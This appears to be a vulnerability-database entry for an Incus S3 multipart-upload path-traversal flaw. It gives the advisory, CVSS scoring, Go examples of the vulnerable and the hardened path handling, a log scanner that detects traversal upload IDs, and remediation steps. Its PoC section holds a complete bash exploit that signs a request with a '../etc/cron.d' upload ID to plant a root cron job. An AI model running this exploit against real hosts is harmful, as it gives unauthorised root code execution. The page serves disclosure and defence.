Incus CVE-2026-48753
CRITICAL (severity by source)
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Network-reachable S3 API with low complexity but mandatory bucket credentials (PR:L); host file write escapes the storage sandbox (S:C) and enables root RCE, giving full C/I/A:H.
Primary rating from GitHub Advisory.
CVSS Vector (GitHub Advisory)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Description (GitHub Advisory)
Summary
The S3 protocol upload endpoint is vulnerable to path traversal and allows creation of arbitrary files on the host. This behavior could lead to arbitrary command execution.
In internal/server/storage/s3/local/multipart.go, the user-controlled upload ID is appended to the uploads directory unsanitized: https://github.com/lxc/incus/blob/40dd4f151d52c06b178482aa2518abfb9df3e6fb/internal/server/storage/s3/local/multipart.go#L33
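To show the defect and its remedy side by side, the following is an added Go example; it is not code from Incus or from the advisory. vulnerableUploadDir reproduces the unsanitized join the advisory describes (filepath.Join collapses ".." components, so a traversal ID resolves outside the uploads directory), while safeUploadDir and partPath apply the two defences a fixed backend needs: an allow-list on the ID and a containment check on the resulting path. The uploads directory layout, the upload-ID character set and the part-NNNNN file naming are assumptions, not facts from the page.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"regexp"
	"strings"
)

// ErrBadUploadID is returned for any upload ID that fails validation.
var ErrBadUploadID = errors.New("invalid multipart upload id")

// uploadIDPattern is an assumed allow-list: server-generated IDs made of
// URL-safe characters only. The real Incus ID format is not given on this page.
var uploadIDPattern = regexp.MustCompile(`^[A-Za-z0-9_-]{1,128}$`)

// vulnerableUploadDir reproduces the flawed pattern described in the advisory:
// the caller-controlled upload ID is joined onto the uploads directory as-is.
// filepath.Join collapses "..", so a traversal ID resolves outside uploadsDir.
func vulnerableUploadDir(uploadsDir, uploadID string) string {
	return filepath.Join(uploadsDir, uploadID)
}

// isWithin reports whether candidate is base itself or a descendant of base,
// after both paths are cleaned. This is the structural check that an
// allow-list alone does not give you.
func isWithin(base, candidate string) bool {
	base = filepath.Clean(base)
	candidate = filepath.Clean(candidate)
	rel, err := filepath.Rel(base, candidate)
	if err != nil {
		return false
	}
	return rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator))
}

// safeUploadDir applies both defences: reject IDs outside the allow-list, then
// prove the resulting path is still strictly under uploadsDir before returning it.
func safeUploadDir(uploadsDir, uploadID string) (string, error) {
	if !uploadIDPattern.MatchString(uploadID) {
		return "", ErrBadUploadID
	}
	dir := filepath.Join(uploadsDir, uploadID)
	if !isWithin(uploadsDir, dir) || dir == filepath.Clean(uploadsDir) {
		return "", ErrBadUploadID
	}
	return dir, nil
}

// partPath derives where a part body would be stored. The "part-%05d" naming is
// an assumption taken from the PoC's target filename, not from the Incus source.
func partPath(uploadsDir, uploadID string, partNumber int) (string, error) {
	dir, err := safeUploadDir(uploadsDir, uploadID)
	if err != nil {
		return "", err
	}
	return filepath.Join(dir, fmt.Sprintf("part-%05d", partNumber)), nil
}

func main() {
	base := "/var/lib/incus/buckets/uploads" // assumed layout, not the real Incus path
	for _, id := range []string{"7f3a9c2e", "../../../../../../etc/cron.d"} {
		fmt.Printf("vulnerable: %q -> %s\n", id, vulnerableUploadDir(base, id))
		p, err := partPath(base, id, 1)
		fmt.Printf("hardened:   %q -> path=%q err=%v\n", id, p, err)
	}
}
```

The containment check is kept even though the allow-list already excludes "/" and ".": if the ID format is later loosened, isWithin still prevents any joined path from leaving the uploads directory.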
PoC
Setup
# Expose the S3 API and create a bucket
incus config set core.storage_buckets_address=:8555
incus storage volume create default bucket
#> note the credentials
Exploitation
The script below was mostly generated.
#!/usr/bin/env bash
set -euo pipefail
if [ $# -lt 4 ]; then
printf 'usage: $0 endpoint bucket access-key secret-key\n' >&2
exit 1
fi
endpoint="${1%/}"
bucket="${2}"
access="${3}"
secret="${4}"
region="us-east-1"
service="s3"
key="anything"
part="1"
upload_id="../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/cron.d"
target="/etc/cron.d/part-00001"
cmd="id > /incus-s3-uploadid-bash-rce; rm -f $target"
body="* * * * * root /bin/sh -c '$cmd'
"
uri_path="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://[^/]+##')/$bucket/$key"
uri_path="${uri_path#/}"
uri_path="/$uri_path"
host="$(printf '%s' "$endpoint" | sed -E 's#^[a-z]+://([^/]+).*#\1#')"
qs="partNumber=$part&uploadId=${upload_id//\//%2F}"
url="$endpoint/$bucket/$key?$qs"
amz_date=$(date -u +%Y%m%dT%H%M%SZ)
date_scope="${amz_date:0:8}"
scope="$date_scope/$region/$service/aws4_request"
body_hash=$(printf '%s' "$body" | sha256sum | awk '{print $1}')
signed="host;x-amz-content-sha256;x-amz-date"
canonical="PUT
$uri_path
$qs
host:$host
x-amz-content-sha256:$body_hash
x-amz-date:$amz_date
$signed
$body_hash"
canonical_hash="$(printf '%s' "$canonical" | sha256sum | awk '{print $1}')"
string_to_sign="AWS4-HMAC-SHA256
$amz_date
$scope
$canonical_hash"
hmac_hex() {
printf '%s' "${2}" | openssl dgst -sha256 -mac HMAC -macopt "hexkey:${1}" -binary | xxd -p -c 256
}
k_date=$(printf 'AWS4%s' "$secret" | xxd -p -c 256)
k_date=$(hmac_hex "$k_date" "$date_scope")
k_region=$(hmac_hex "$k_date" "$region")
k_service=$(hmac_hex "$k_region" "$service")
k_signing=$(hmac_hex "$k_service" "aws4_request")
sig=$(hmac_hex "$k_signing" "$string_to_sign")
auth="AWS4-HMAC-SHA256 Credential=${access}/${scope},SignedHeaders=${signed},Signature=${sig}"
printf '\n# body:\n%s' "${body}"
curl -ksS -X PUT "${url}" \
-H "Host: ${host}" \
-H "X-Amz-Date: ${amz_date}" \
-H "X-Amz-Content-Sha256: ${body_hash}" \
-H "Authorization: ${auth}" \
--data-binary "${body}"
Impact
Arbitrary file write on the host. Possibly leading to arbitrary command execution.
Analysis (AI)
Arbitrary host file write in Incus before 7.1.0 lets a holder of S3 bucket credentials escape the storage volume via a path-traversal-laden multipart upload ID and plant files anywhere the daemon (typically root) can write, escalating to remote code execution. The flaw lives in the local S3 storage backend's multipart upload handling, where the attacker-supplied uploadId is concatenated onto the uploads directory without sanitization. …
Vulnerability Assessment (AI)
| Aspect | Assessment |
| --- | --- |
| Exploitation | Requires three concrete preconditions taken from the description and PoC: (1) the Incus S3 API must be explicitly enabled via core.storage_buckets_address (off by default), (2) at least one storage bucket must exist, and (3) the attacker must hold valid bucket access-key/secret-key credentials to produce a SigV4-signed request (PR:L, authenticated). … |
| Risk Assessment | The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects a low-complexity, network-reachable attack that nonetheless requires some privilege (PR:L), specifically valid S3 bucket credentials, and produces a scope change (writing host files outside the storage sandbox). … |
| Exploit Scenario | An attacker who has been issued (or has stolen) S3 access/secret keys for any Incus bucket sends a signed PUT multipart-upload request whose uploadId is a long '../../../etc/cron.d' traversal string, causing the uploaded part body to be written as /etc/cron.d/part-00001. The cron file runs an attacker command as root on the next schedule tick, yielding host compromise. … |
| Remediation | Upgrade to Incus 7.1.0 or later, which contains the fix (vendor-released patch 7.1.0; see advisory GHSA-ccjc-4qc3-jxqc at https://github.com/lxc/incus/security/advisories/GHSA-ccjc-4qc3-jxqc). … |
Recommended Action (AI)
Within 24 hours: Inventory all Incus deployments with S3 storage backend on versions before 7.1.0; disable S3 storage or isolate systems from untrusted networks; audit S3 credential usage in access logs. …
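For the access-log audit step, here is an added Go example (not a vuln.today or Incus artifact): it scans request lines for multipart part uploads whose uploadId, after unwinding every layer of percent-encoding, contains a path separator or a ".." component, which a server-generated ID never should. It goes slightly beyond the PoC's single-encoded "%2F" by also catching double-encoded values. The "METHOD /path?query" request-line format and the sample lines are constructed; the real Incus access-log format is not shown on this page.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Finding records one request whose uploadId looks like a traversal attempt.
type Finding struct {
	Line     string
	UploadID string // fully percent-decoded value
}

// decodeFully unwinds up to maxRounds layers of percent-encoding so that a
// double-encoded "%252F" is seen as the "/" it becomes after two decodes.
func decodeFully(s string, maxRounds int) string {
	for i := 0; i < maxRounds; i++ {
		next, err := url.QueryUnescape(s)
		if err != nil || next == s {
			break
		}
		s = next
	}
	return s
}

// suspiciousUploadID returns the decoded ID and whether it contains any path
// separator or ".." sequence.
func suspiciousUploadID(raw string) (string, bool) {
	decoded := decodeFully(raw, 3)
	return decoded, strings.ContainsAny(decoded, `/\`) || strings.Contains(decoded, "..")
}

// scanRequests takes request lines of the form "METHOD /path?query" and
// reports every request carrying a suspicious uploadId query parameter.
func scanRequests(lines []string) []Finding {
	var out []Finding
	for _, line := range lines {
		fields := strings.Fields(line)
		if len(fields) < 2 {
			continue
		}
		u, err := url.Parse(fields[1])
		if err != nil {
			continue
		}
		raw := u.Query().Get("uploadId") // Query() applies one layer of decoding
		if raw == "" {
			continue
		}
		if decoded, bad := suspiciousUploadID(raw); bad {
			out = append(out, Finding{Line: line, UploadID: decoded})
		}
	}
	return out
}

// sampleRequests are constructed request lines in a simplified format; they are
// not real Incus access logs.
var sampleRequests = []string{
	"PUT /bucket/anything?partNumber=1&uploadId=7f3a9c2e",
	"PUT /bucket/anything?partNumber=1&uploadId=..%2F..%2F..%2Fetc%2Fcron.d",
	"PUT /bucket/anything?partNumber=2&uploadId=..%252F..%252Fetc",
	"POST /bucket/anything?uploads",
}

func main() {
	for _, f := range scanRequests(sampleRequests) {
		fmt.Printf("ALERT traversal in uploadId=%q  line=%q\n", f.UploadID, f.Line)
	}
}
```

Alerts from this scan identify which bucket credentials were used for the attempt, which is the input the credential-audit and revocation step needs.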
Same weakness: CWE-73 – External Control of File Name or Path
Same technique: Path Traversal
External PoC / exploit code: GHSA-ccjc-4qc3-jxqc